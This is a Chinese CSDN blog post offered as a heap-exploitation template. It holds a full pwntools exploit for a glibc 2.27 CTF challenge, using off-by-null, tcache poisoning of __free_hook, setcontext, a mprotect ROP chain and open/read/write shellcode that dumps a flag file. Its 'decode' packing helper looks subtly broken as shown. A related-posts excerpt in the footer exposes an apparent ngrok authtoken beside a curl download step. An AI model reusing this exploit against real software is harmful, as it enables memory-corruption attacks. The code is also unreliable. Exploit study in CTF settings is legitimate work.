2.27 off by null +orw

已于 2022-11-12 20:02:50 修改
阅读量89 收藏
点赞数
分类专栏: 堆利用模板 文章标签: 网络安全
于 2022-11-07 21:04:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FUCKING12/article/details/127739309
版权 
from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './sandboxheap'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

# context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote()
else:
    #r = process(argv = ['./sandbox', file_name])
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)
    pause()
def decode(x):
 return bin(x)[2:].rjust(64)[::-1]

menu = 'Your choice: '

def add(index, size):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Index: ', str(index))
    r.sendlineafter('Size: ', str(size))

def edit(index, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Index: ', str(index))
    r.sendafter('Content: ', content)

def show(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Index: ', str(index))

def delete(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('Index: ', str(index))

for i in range(7):
    add(i, 0xf8)    #0 - 6

add(7, 0xf8)
add(8, 0x88)
add(9, 0xf8)
add(10, 0x10)

for i in range(8):
    delete(i)

edit(8, '1' * 0x80 * 8 + decode(0x190) + '\x00')

delete(9)

for i in range(7):
    add(i, 0xf8)

add(7, 0xf8)

show(8)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
li('malloc_hook = ' + hex(malloc_hook))
libc = ELF('./libc-2.27.so')

libc_base = malloc_hook - libc.sym['__malloc_hook']
li('libc_base = ' + hex(libc_base))

free_hook = libc_base + libc.sym['__free_hook']
li('free_hook = ' + hex(free_hook))

setcontext = libc_base + libc.sym['setcontext'] + 53
li('setcontext = ' + hex(setcontext))

add(11, 0xf8)
delete(8)

edit(11, decode(free_hook))
add(8, 0xf8)
add(12, 0xf8)

edit(12, decode(setcontext))
# dbg()
syscall=libc_base+libc.search(asm("syscall\nret")).__next__()
li('syscall = ' + hex(syscall))

add(13, 0xf8)

rsp = free_hook&0xfffffffffffff000
rsi = rsp
p1 = decode(0) * 14
p1 += decode(rsi) + decode(0) * 2 + decode(0x2000) + decode(0) * 2
p1 += decode(rsp)
p1 += decode(syscall)
dbg()
edit(13, p1)
# dbg()
delete(13)
# dbg()

layout = [
    libc_base+libc.search(asm("pop rdi\nret")).__next__(), #: pop rdi; ret;
    free_hook & 0xfffffffffffff000,
    libc_base+libc.search(asm("pop rsi\nret")).__next__(), #: pop rsi; ret;
    0x2000,
    libc_base+libc.search(asm("pop rdx\nret")).__next__(), #: pop rdx; ret;
    7,
    libc_base+libc.search(asm("pop rax\nret")).__next__(), #: pop rax; ret;
    10,
    syscall, #: syscall; ret;
    libc_base+libc.search(asm("jmp rsp")).__next__(), #: jmp rsp;
]

shellcode = asm('''
sub rsp, 0x800
push 0x67616c66 
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall

cmp eax, 0
js failed

mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall

mov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscall

jmp exit

failed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall

exit:
xor edi, edi
mov eax, 231
syscall
''')

r.send(flat(layout) + shellcode)

r.interactive()

参考链接

thna0s
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn——沙箱机制
djhtdjdywgjc的博客
11-20 1871
pwn沙箱
祥云杯2022 pwn - sandboxheap
z1r0的博客
11-02 429
上了sandbox,需要逆一下,在0x2710这里的功能就是允许mport和orw,所以在上面第一次exp的基础上还要再加上一个。下面的exp是笔者第一次直接打sandboxheap的,可以实现orw,然后第二个exp是打题目的,因为题目上了sandbox。这里笔者没有使用SigreturnFrame,直接看的setcontext + 53的汇编然后自己写了一下布局。其实就是一个2.27下的orw,直接拿板子套,直接参考的这位。在上一个heap基础上加了一个沙箱。的2.27下的orw
BUUCTF-PWN-pwnable_asm-Sandbox
Rt1Text的博客
07-21 281
检查允许的系统调用orw是允许的,用open()打开flag文件,通过read()和write()读取并输出。
pwn中沙盒保护之orw绕过
最新发布
wangxunyu6的博客
03-09 901
简单来说开启沙盒保护后execve被禁用,也就是说即使我们拿到shell也没有用。我们可以使用seccomp-tools dump指令进行查看。
CTF-PWN-沙箱逃脱-【seccomp和prtcl-1】
llovewuzhengzi的博客
01-08 1365
code为0x20是BDF_LD(0x00)|BDF_ABS(0X20)|BOF_W的结果,就是将一个字的值通过固定偏移量复制到累加器中,此时k对应为偏移量4,即seccomp_data偏移量为4的位置正好是arch的结构。此时code 15是BPF_JMP(0x05)|BPF_JEQ(0x10)的结果,此时是相等跳转指令,相等则跳转到下一条指令,不相等则跳转到下条指令+0x19的位置,将累加器与k的值做对比,此时累加器的值是之前取的arch。,但每个头文件的这个“标识”都应该是唯一的。
欧姆龙plc指令 (2).pdf
11-16
3. **比较指令**:如`ON UP`和`OFF DOWN`,用于判断输入信号状态的变化,`ON UP`在信号上升沿触发,`OFF DOWN`在信号下降沿触发。 4. **数据传送指令**:包括`NOT`(非)、`AND`(与)、`OR`(或)、`XOR`(异或)...
欧姆龙plc指令 (2).docx
11-16
3. **比较指令**:例如`ON UP`和`OFF DOWN`用于检测输入值是否上升或下降,`NOT`、`AND`、`OR`、`AND NOT`和`OR NOT`用于进行逻辑比较。 4. **数据传送指令**:如`LD`(装载)、`NOT`(非)、`SET`(置位)、`RSET`...
欧姆龙omronPLC指令.pdf
11-16
- `ON UP`,`OFF DOWN`:条件判断,检测输入信号是否处于上升沿或下降沿。 - `CJPF`,`CJPFOR`:条件跳转指令,根据条件决定是否执行跳转。 4. **数据处理指令**: - `SFT`,`SFTR`:移位寄存器,实现数据位的...
计算机系统基础第二次作业.doc
05-25
4. `orw $0xFFFF0, (%ebx)`:操作数超过16位,但使用了`w`后缀,应改为`l`。 5. `addb $0xF8, (%dl)`:不能使用8位寄存器 `%dl`作为地址所在寄存器。 6. `movl %bx, %eax`:源操作数 `%bx`(16位)与目的操作数 `%...
aserteee:我的GitHub个人资料的配置文件
03-22
作业:Create_Windows_2019_Azure_RDP_by_TinHocThucHanh池:vmImage:Windows最新步骤: 结帐:无 脚本: 回声ngrok的authToken “1q6MPXb3oRW5wyDpZkfqLaw2lMh_46EQ4JLUPuaCW3MRrQwGL”> NGROK.bat卷曲-s -O ...
pwn-随机计算题类型
IT_huanhuan的博客
05-25 1100
沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,**只能采取open/read/write的组合方式来读取flag。
2022强网拟态pwn-only
z1r0的博客
11-23 402
所以攻击思路大致是这样的,任意地址申请到tcache管理这里,打出290的key为7,这样再释放之后290这里会进入unsortedbin中,打刚刚释放的这个地方到stdout那里去泄露出libc。这里需要爆破,泄露出libc之后继续利用unsortedbin的分割来打hook到tcache里,接着申请出来,打hook为magic_gadget。这里的magic_gadget就是2.31下的orw的magic_gadget。这里需要注意的是seccomp上的沙箱,所以堆上会有残留的bins。
JS 构建沙箱环境sandbox
赵泽清的博客
03-22 2447
市面上现在流行两种沙箱模式,一种是使用iframe,还有一种是直接在页面上使用new Function + eval进行执行。 殊途同归,主要还是防止一些Hacker们 吃饱了没事干,收别人钱来 Hack 你的网站。 一般情况, 我们的代码量有60%业务+40%安全. 剩下的就看天意了。接下来,我们来一步一步分析,如果做到在前端的沙箱.文末 看俺有没有心情放一个彩蛋吧。直接嵌套这种方式说起来并不是什么特别好的点子,因为需要花费比较多的精力在安全性上. eval执行最简单的方式,就是使用eval进行代码的执行
zctf-2017-pwn-sandbox
weixin_30907935的博客
03-12 487
才接触二进制不久,第一次写博客,萌新一只,zctf被表哥们虐得体无完肤,只能坐等writeup,最近参考flappypig的writeup研究sandbox这道题目,用了三天,记录一下。 ps:基础太渣,可能有理解错误的地方,大佬莫笑,麻烦大佬在评论中指出。。。 接下来进入正题 这道题有两个二进制文件:sandbox和vul。用sandbox运行vul程序,其中vul程序存在栈溢出...
pwn -- 沙盒机制详解
lifanxin的博客
05-13 6374
沙盒机制详解概述开启沙盒的两种方式prctl函数调用seccomp库函数使用seccomp-tools识别沙盒两道例题pwnable_asm参考博客总结 概述   沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。   在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只
pwn学习之三
weixin_30877181的博客
10-27 230
whctf2017的一道pwn题sandbox,这道题提供了两个可执行文件加一个libc,两个可执行文件是一个vuln,一个sandbox,这是一道通过沙盒去保护vuln不被攻击的题目。 用ida打开vuln: 进入80485CB函数: 这里s给的空间是48但是输入是直到换行停止,这里就存在了栈溢出。但是这道题目开了CANARY,所以不能直接覆盖到返回地址。注意到这题,s的空间下面就...
pwn基础知识笔记
月阴荒的博客
02-20 2317
算是总的开一篇文章,把学到的知识总结一下,之后会重复写到各个文章里面 checksec指令, 用来查询pwn题目的壳和保护,并且能够看到程序的信息 1.Canary保护 参考链接:https://blog.csdn.net/weixin_44540286/article/details/101629735?utm_source=distribute.pc_relevant.none-task Ca...
简单说说容器/沙盒(Sandbox)以及Linux seccomp
热门推荐
Netfilter
07-20 1万+
如果应用程序逻辑有误,会造成操作系统崩溃… 这句话其实不对。如果一个应用程序都能让一个操作系统崩溃了,那这一定是这个系统在设计上或者实现上的BUG!再次重申,我不知道谭浩强的C语言教材现在是怎么讲的,但是至少在15年前,很多老师都会说访问空指针会造成操作系统崩溃,这在32位虚拟内存的系统中是错误的。 虽然一个应用程序不能让一个正常的现代操作系统崩溃,但是它却可以对操作系统的运行环境造成巨大...
【八芒星计划】 ORW
carol2358的博客
09-01 3932
本篇用来记录ORWORW可以分为2.27以下的orw和2.29以上的orw,如果是本地请自备flag文件 orw技术是用来应对沙盒的 文章目录oooorder2019-BALSN-CTF-plaintext oooorder 本题是2.27的orw,漏洞是uaf,漏洞在这里不展开讲,uaf也并不难 2.27的orw既可以使用heap_addr,也可以不要,先讲不需要heap_addr的,毕竟能少泄漏就少泄漏 最重要的是使用了setcontext这个函数,来达成我们控制寄存器的目的 2.27得setcont
return orw();
12-19
return orw()是一个函数调用表达式,它会调用名为orw()的函数,并将函数的返回值作为整个表达式的值返回。 在这个表达式中,orw()表示一个被定义的函数。函数调用的一般形式是函数名后跟一对括号,括号中可以包含一些参数。这里的orw()没有提供参数,表示函数调用时没有传递任何参数给这个函数。 在函数调用完成后,使用return关键字可以将函数的返回值作为整个表达式的值返回给调用者。这个返回值可以是任何类型的值,包括整数、浮点数、字符串等。 需要注意的是,这个表达式中没有给出具体的函数定义和实现,因此无法确定orw()函数的具体功能和返回值类型。如果想要理解orw()的具体含义,需要查看定义和实现该函数的代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值